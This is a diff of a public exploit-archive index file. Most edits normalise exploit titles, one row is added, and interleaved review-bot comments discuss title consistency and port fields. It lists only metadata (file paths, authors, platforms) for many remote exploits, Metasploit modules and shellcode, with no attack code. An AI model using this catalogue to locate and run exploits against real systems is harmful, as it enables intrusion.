18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0
18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0
@ -11817,7 +11819,7 @@ id,file,description,date,author,platform,type,port
19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0
19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0
19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0
19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0
@ -11832,7 +11834,7 @@ id,file,description,date,author,platform,type,port
19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
@ -11866,7 +11868,7 @@ id,file,description,date,author,platform,type,port
19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote,0
19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote,0
19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0
19208,platforms/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",windows,remote,0
19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0
@ -11885,7 +11887,7 @@ id,file,description,date,author,platform,type,port
19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0
19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0
19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0
19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,linux,remote,0
19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd Exploit",1999-06-17,anonymous,linux,remote,0
19266,platforms/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Stack Overflow",2012-06-18,modpr0be,windows,remote,0
19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0
@ -11900,7 +11902,7 @@ id,file,description,date,author,platform,type,port
19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0
19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0
19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0
19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0
19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0
19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0
@ -11947,7 +11949,7 @@ id,file,description,date,author,platform,type,port
19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0
19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0
19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0
19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit",1997-10-19,"Bryan Berg",php,remote,0
19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (1)",1998-03-16,Rootshell,hardware,remote,0
@ -12097,7 +12099,7 @@ id,file,description,date,author,platform,type,port
19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (2)",2000-05-16,L0pht,multiple,remote,0
19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (3)",2000-05-16,L0pht,multiple,remote,0
19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password",2000-05-17,"rain forest puppy",windows,remote,0
19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0
19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0
19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0
19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0
@ -12354,7 +12356,7 @@ id,file,description,date,author,platform,type,port
20516,platforms/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0
20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0
20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote,0
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure",2000-12-27,Ksecurity,cgi,remote,0
20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0
20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote,0
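Review bot: the 20523 change only lowercases "And", leaving "Command Execution and File Disclosure", while the other renames in this commit separate two distinct issues with " / " (for example "Login Bypass / Privilege Escalation" in 35077). These are two separate impact classes, so "Command Execution / File Disclosure" would be consistent with the rest of the pass.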
@ -12472,7 +12474,7 @@ id,file,description,date,author,platform,type,port
20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote,0
20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0
20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0
20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution (Metasploit)",2012-08-27,Metasploit,linux,remote,0
20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,multiple,remote,0
20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0
@ -12606,7 +12608,7 @@ id,file,description,date,author,platform,type,port
21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0
21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0
21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0
21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,windows,remote,0
21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0
21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0
21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0
@ -13266,7 +13268,7 @@ id,file,description,date,author,platform,type,port
23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0
23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0
23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",windows,remote,0
23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote,0
@ -13387,7 +13389,7 @@ id,file,description,date,author,platform,type,port
23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0
23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0
23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0
23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0
23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0
23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote,0
@ -13402,7 +13404,7 @@ id,file,description,date,author,platform,type,port
23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0
23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0
23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote,0
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help and Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0
23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0
23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location",2004-02-19,"Michael Evanchik",windows,remote,0
@ -13588,7 +13590,7 @@ id,file,description,date,author,platform,type,port
24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote,0
24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,windows,remote,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0
24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,windows,remote,0
@ -13815,7 +13817,7 @@ id,file,description,date,author,platform,type,port
25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0
25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote,0
@ -14403,7 +14405,7 @@ id,file,description,date,author,platform,type,port
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@ -14513,7 +14515,7 @@ id,file,description,date,author,platform,type,port
31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote,0
31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0
31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0
31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0
@ -15016,7 +15018,7 @@ id,file,description,date,author,platform,type,port
35005,platforms/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0
35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0
35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0
35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0
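Review bot: The 35011 edit removes the word "Parameters" in addition to replacing "and" with " / ", whereas single-parameter titles elsewhere in the file keep it (12257, "'id' Parameter SQL Injection"). Either keep it here ("'sort' / 'orderBy' Parameters Cross-Site Scripting") or drop it everywhere, otherwise a title search for "Parameter" misses the multi-parameter rows; 31549 has the same change.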
@ -15733,7 +15735,7 @@ id,file,description,date,author,platform,type,port
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
@ -15768,7 +15770,7 @@ id,file,description,date,author,platform,type,port
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret and Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
@ -15898,6 +15900,7 @@ id,file,description,date,author,platform,type,port
42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080
42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480
42973,platforms/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
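Review bot: The new 42973 row is titled only "VX Search Enterprise 10.1.12 - Buffer Overflow" and carries port 0, so the index gives no hint of the affected request or service. Other remote rows name the vector in the title (41775, "'GET' Buffer Overflow (SEH)") or record the port (42964 with 8080, 42965 with 2480); if the exploit file identifies either, add it here so the entry can be matched against exposed services during triage.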
@ -17896,7 +17899,7 @@ id,file,description,date,author,platform,type,port
3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0
3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
3089,platforms/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0
